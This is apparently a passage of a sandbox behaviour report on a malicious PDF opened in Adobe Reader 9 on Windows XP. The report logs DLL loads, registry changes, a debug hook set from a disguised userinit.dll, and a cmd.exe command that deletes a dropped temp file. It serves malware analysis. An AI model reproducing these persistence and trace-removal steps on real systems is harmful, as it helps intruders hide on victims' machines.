Section loaded	Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid	success or wait	2096265513
Section loaded	Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 3C0000 Size: 36864 Protection: read write Mapped to pid: own pid	conflicting addresses	2096275948
Section loaded	Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid	success or wait	2096285071
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	2096290537
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	2096664642
Section loaded	Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid	success or wait	2096677118
Section loaded	Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid	object name not found	2096689181
Section loaded	Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid	success or wait	2096689860
Section loaded	Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid	object name not found	2096696616
Section loaded	Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	2096697437
Section loaded	Path: \KnownDlls\MPR.dll Access: write and read and execute Type: unknown Baseaddress: 71B20000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	2096711550
Windows hook set	Module: C:\Documents and Settings\Administrator\Local Settings\Application Data\Windows\userinit.dll TID: 0 Hook ID: debug	success	2096896711
Section loaded	Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: AF0000 Size: 401408 Protection: execute Mapped to pid: own pid	success or wait	2097246173
Section loaded	Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: AF0000 Size: 299008 Protection: execute Mapped to pid: own pid	success or wait	2097446195
Section loaded	Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid	success or wait	2097502517
Section loaded	Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid	object name exists	2098420101
Section loaded	Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: AF0000 Size: 262144 Protection: read write Mapped to pid: own pid	success or wait	2098844567
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Personal Type: String Data: C:\Documents and Settings\Administrator\My Documents	success or wait	2099849892
Section loaded	Path: \KnownDlls\SETUPAPI.dll Access: write and read and execute Type: unknown Baseaddress: AF0000 Size: 262144 Protection: read write Mapped to pid: own pid	object name not found	2099850210
Section loaded	Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid	success or wait	2099851087
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{0d6ab97b-ade6-11de-bdcc-806d6172696f} Name: BaseClass Type: String Data: Drive	success or wait	2100044546
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e9036068-1842-11df-9766-806d6172696f} Name: BaseClass Type: String Data: Drive	success or wait	2100050153
Key value set	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Common Documents Type: String Data: C:\Documents and Settings\All Users\Documents	success or wait	2100067133
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Desktop Type: String Data: C:\Documents and Settings\Administrator\Desktop	success or wait	2100077028
Key value set	Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Common Desktop Type: String Data: C:\Documents and Settings\All Users\Desktop	success or wait	2100080418
Section loaded	Path: \KnownDlls\CLBCATQ.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid	object name not found	2100095468
Section loaded	Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid	success or wait	2100096194
Section loaded	Path: \KnownDlls\COMRes.dll Access: write and read and execute Type: unknown Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid	object name not found	2100098984
Section loaded	Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid	success or wait	2100099729
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	2100103921
Section loaded	Path: \BaseNamedObjects\Local\UrlZonesSM_Administrator Access: query and write and read Type: commit Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	object name exists	2100261706
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: ProxyBypass Type: Dword Data: 1	success or wait	2100263976
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: IntranetName Type: Dword Data: 1	success or wait	2100264152
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: UNCAsIntranet Type: Dword Data: 1	success or wait	2100264323
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: AutoDetect Type: Dword Data: 1	success or wait	2100264492
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: ProxyBypass Type: Dword Data: 1	success or wait	2100267789
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: IntranetName Type: Dword Data: 1	success or wait	2100267965
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: UNCAsIntranet Type: Dword Data: 1	success or wait	2100268134
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: AutoDetect Type: Dword Data: 1	success or wait	2100268302
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Cache Type: String Data: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files	success or wait	2100273003
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Cookies Type: String Data: C:\Documents and Settings\Administrator\Cookies	success or wait	2100274251
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: B50000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	2100691475
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: B50000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	2100746860
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: B50000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	2100807147
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: B50000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	2100809570
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap Name: C:\WINDOWS\system32\cmd.exe Type: String Data: Windows Command Processor	success or wait	2100813466
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and write and read and execute and extend size Type: image Baseaddress: B50000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	2100872411
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: B50000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	2100875513
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: B60000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	2100878057
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	2100881782
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: B60000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	2100890500
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: C90000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	2100912801
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: C90000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	2100915258
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: C90000 Size: 389120 Protection: execute Mapped to pid: own pid	success or wait	2100920057
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: C90000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	2100922535
Section loaded	Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: B60000 Size: 389120 Protection: readonly Mapped to pid: own pid	success or wait	2100956770
Process created	PID: 2172 Path: C:\WINDOWS\system32\cmd.exe Cmdline: C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp > nul Createflags: 0	success or wait	2100961479
Section loaded	Path: none Access: query and write and read Type: commit Baseaddress: B70000 Size: 4096 Protection: read write Mapped to pid: own pid	success or wait	2161741555

Analysis File: AcroRd32.exe PID: 1904 Parent PID: 3208

+ Sections

+ General
Start time:	05:25:40
Start date:	02/12/2011
Path:	C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe
Commandline:	C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Bin Laden s successor.pdf
Imagebase:	0x400000
File size:	349616 bytes
MD5 hash:	98536D980F14545816DD33998146EE9C

Section Activities:

+ Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	unknown	7C800000	1007616	own pid	read write	success or wait	1
none	query and write and read and execute and extend size	reserve	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	unknown	270000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	unknown	290000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	unknown	2E0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	unknown	330000	24576	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey00000409	read	unknown	330000	24576	own pid	readonly	object name not found	1
\NLS\NlsSectionSortkey00000409	read	unknown	330000	24576	own pid	readonly	object name not found	1
\KnownDlls\USER32.dll	write and read and execute	unknown	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	unknown	77F10000	299008	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	unknown	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	unknown	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	unknown	77FE0000	69632	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	unknown	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	unknown	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	unknown	77F60000	483328	own pid	read write	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcp80.dll	query and write and read and execute	image	7C420000	552960	own pid	read write	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcr80.dll	query and write and read and execute	image	78130000	634880	own pid	read write	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	340000	110592	own pid	execute	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	340000	110592	own pid	execute	success or wait	1
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	unknown	370000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	940000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	940000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	390000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	390000	4096	own pid	readonly	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	read	commit	390000	4096	own pid	readonly	success or wait	1
C:\WINDOWS\system32\rpcss.dll	write and read and execute	commit	20C0000	401408	own pid	execute	success or wait	1
C:\WINDOWS\system32\msctf.dll	write and read and execute	commit	20C0000	299008	own pid	execute	success or wait	1
C:\WINDOWS\system32\msctf.dll	query and write and read and execute	image	74720000	311296	own pid	read write	success or wait	1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500	query and write and read	commit	74720000	311296	own pid	read write	object name exists	1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500	query and write and read and execute and extend size	unknown	20D0000	262144	own pid	read write	success or wait	1
C:\WINDOWS\system32\msctfime.ime	write and read and execute	commit	2210000	180224	own pid	execute	success or wait	1
C:\WINDOWS\system32\msctfime.ime	query and read	commit	2210000	180224	own pid	readonly	success or wait	1
C:\WINDOWS\system32\msctfime.ime	write and read and execute	commit	2210000	180224	own pid	execute	success or wait	1
C:\WINDOWS\system32\msctfime.ime	query and read	commit	2210000	180224	own pid	readonly	success or wait	1
\BaseNamedObjects\ShimSharedMemory	write	unknown	2210000	57344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msctfime.ime	write and read and execute	commit	2220000	180224	own pid	execute	success or wait	1
C:\WINDOWS\system32\msctfime.ime	query and write and read and execute	image	755C0000	188416	own pid	read write	success or wait	1

+ Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\KnownDlls\AcroRd32.dll	write and read and execute	unknown	390000	4096	own pid	readonly	object name not found	1	4038E2
C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.dll	query and write and read and execute	image	940000	20512768	own pid	read write	conflicting addresses	1	4038E2
\KnownDlls\WININET.dll	write and read and execute	unknown	3D930000	942080	own pid	read write	success or wait	1	4038E2
\KnownDlls\Normaliz.dll	write and read and execute	unknown	3C0000	36864	own pid	read write	conflicting addresses	1	4038E2
\KnownDlls\urlmon.dll	write and read and execute	unknown	1CD0000	1257472	own pid	read write	conflicting addresses	1	4038E2
\KnownDlls\ole32.dll	write and read and execute	unknown	774E0000	1302528	own pid	read write	success or wait	1	4038E2
\KnownDlls\OLEAUT32.dll	write and read and execute	unknown	77120000	569344	own pid	read write	success or wait	1	4038E2
\KnownDlls\iertutil.dll	write and read and execute	unknown	3DFD0000	2002944	own pid	read write	success or wait	1	4038E2
\KnownDlls\VERSION.dll	write and read and execute	unknown	77C00000	32768	own pid	read write	success or wait	1	4038E2
\KnownDlls\AGM.dll	write and read and execute	unknown	77C00000	32768	own pid	read write	object name not found	1	4038E2
C:\Program Files\Adobe\Reader 9.0\Reader\AGM.dll	query and write and read and execute	image	6000000	5902336	own pid	read write	success or wait	1	4038E2
\KnownDlls\CoolType.dll	write and read and execute	unknown	6000000	5902336	own pid	read write	object name not found	1	4038E2
C:\Program Files\Adobe\Reader 9.0\Reader\CoolType.dll	query and write and read and execute	image	8000000	2486272	own pid	read write	success or wait	1	4038E2
\KnownDlls\USERENV.dll	write and read and execute	unknown	769C0000	737280	own pid	read write	success or wait	1	4038E2
\KnownDlls\WINMM.dll	write and read and execute	unknown	769C0000	737280	own pid	read write	object name not found	1	4038E2
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1	4038E2
\KnownDlls\BIB.dll	write and read and execute	unknown	76B40000	184320	own pid	read write	object name not found	1	4038E2
C:\Program Files\Adobe\Reader 9.0\Reader\BIB.dll	query and write and read and execute	image	7000000	114688	own pid	read write	success or wait	1	4038E2
\KnownDlls\ACE.dll	write and read and execute	unknown	7000000	114688	own pid	read write	object name not found	1	4038E2
C:\Program Files\Adobe\Reader 9.0\Reader\ACE.dll	query and write and read and execute	image	5000000	798720	own pid	read write	success or wait	1	4038E2

Registry Activities:

+ Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Memory Management\PrefetchParameters	EnablePrefetcher	success or wait	1	40103D

User Activities:

+ Window found
Window name	Class name	HWND of window	Completion	Count	Source Address
no string	AdobeAcrobatSpeedLaunchCmdWnd	0	success	2	0
no string	AdobeReaderSpeedLaunchCmdWnd	0	success	2	0

+ Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	2091483931
Section loaded	Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	2091504528
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	2091520971
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	2091521509
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	2091526209
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	2091528436
Section loaded	Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	object name not found	2091689446
Section loaded	Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	object name not found	2091689585
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	2091696779
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	2091697327
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	2091715749
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	2091723406
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	2091737841
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	2091772855
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	2092230327
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	2092651975
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcp80.dll Access: query and write and read and execute Type: image Baseaddress: 7C420000 Size: 552960 Protection: read write Mapped to pid: own pid	success or wait	2093045020
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcr80.dll Access: query and write and read and execute Type: image Baseaddress: 78130000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	2093063589
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	2093104848
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	2093111178
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	2093125136
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	2093186334
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 940000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	2093191717
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 940000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	2093432125
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	2093480525
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 390000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	2094321542
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	2095216738
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	2095458061
Windows found	Window Name: no string Class Name: AdobeAcrobatSpeedLaunchCmdWnd HWND: 0	success	2095809184
Windows found	Window Name: no string Class Name: AdobeReaderSpeedLaunchCmdWnd HWND: 0	success	2095812048
Key value queried	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Memory Management\PrefetchParameters Name: EnablePrefetcher	success or wait	2095818107
Section loaded	Path: \KnownDlls\AcroRd32.dll Access: write and read and execute Type: unknown Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid	object name not found	2095821027
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.dll Access: query and write and read and execute Type: image Baseaddress: 940000 Size: 20512768 Protection: read write Mapped to pid: own pid	conflicting addresses	2095825183
Section loaded	Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid	success or wait	2097690533
Section loaded	Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 3C0000 Size: 36864 Protection: read write Mapped to pid: own pid	conflicting addresses	2097696106
Section loaded	Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 1CD0000 Size: 1257472 Protection: read write Mapped to pid: own pid	conflicting addresses	2097699445
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	2097730229
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	2097734215
Section loaded	Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid	success or wait	2097739363
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	2097743705
Section loaded	Path: \KnownDlls\AGM.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	object name not found	2097747291
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\AGM.dll Access: query and write and read and execute Type: image Baseaddress: 6000000 Size: 5902336 Protection: read write Mapped to pid: own pid	success or wait	2097748143
Section loaded	Path: \KnownDlls\CoolType.dll Access: write and read and execute Type: unknown Baseaddress: 6000000 Size: 5902336 Protection: read write Mapped to pid: own pid	object name not found	2097782946
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\CoolType.dll Access: query and write and read and execute Type: image Baseaddress: 8000000 Size: 2486272 Protection: read write Mapped to pid: own pid	success or wait	2097783743
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	2097806588
Section loaded	Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	object name not found	2097810789
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	2097811423
Section loaded	Path: \KnownDlls\BIB.dll Access: write and read and execute Type: unknown Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	object name not found	2097815385
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\BIB.dll Access: query and write and read and execute Type: image Baseaddress: 7000000 Size: 114688 Protection: read write Mapped to pid: own pid	success or wait	2097816016
Section loaded	Path: \KnownDlls\ACE.dll Access: write and read and execute Type: unknown Baseaddress: 7000000 Size: 114688 Protection: read write Mapped to pid: own pid	object name not found	2097826703
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\ACE.dll Access: query and write and read and execute Type: image Baseaddress: 5000000 Size: 798720 Protection: read write Mapped to pid: own pid	success or wait	2097827385
Windows found	Window Name: no string Class Name: AdobeAcrobatSpeedLaunchCmdWnd HWND: 0	success	2098066151
Windows found	Window Name: no string Class Name: AdobeReaderSpeedLaunchCmdWnd HWND: 0	success	2098066256
Section loaded	Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 20C0000 Size: 401408 Protection: execute Mapped to pid: own pid	success or wait	2098066845
Section loaded	Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 20C0000 Size: 299008 Protection: execute Mapped to pid: own pid	success or wait	2098173610
Section loaded	Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid	success or wait	2098175173
Section loaded	Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid	object name exists	2098178565
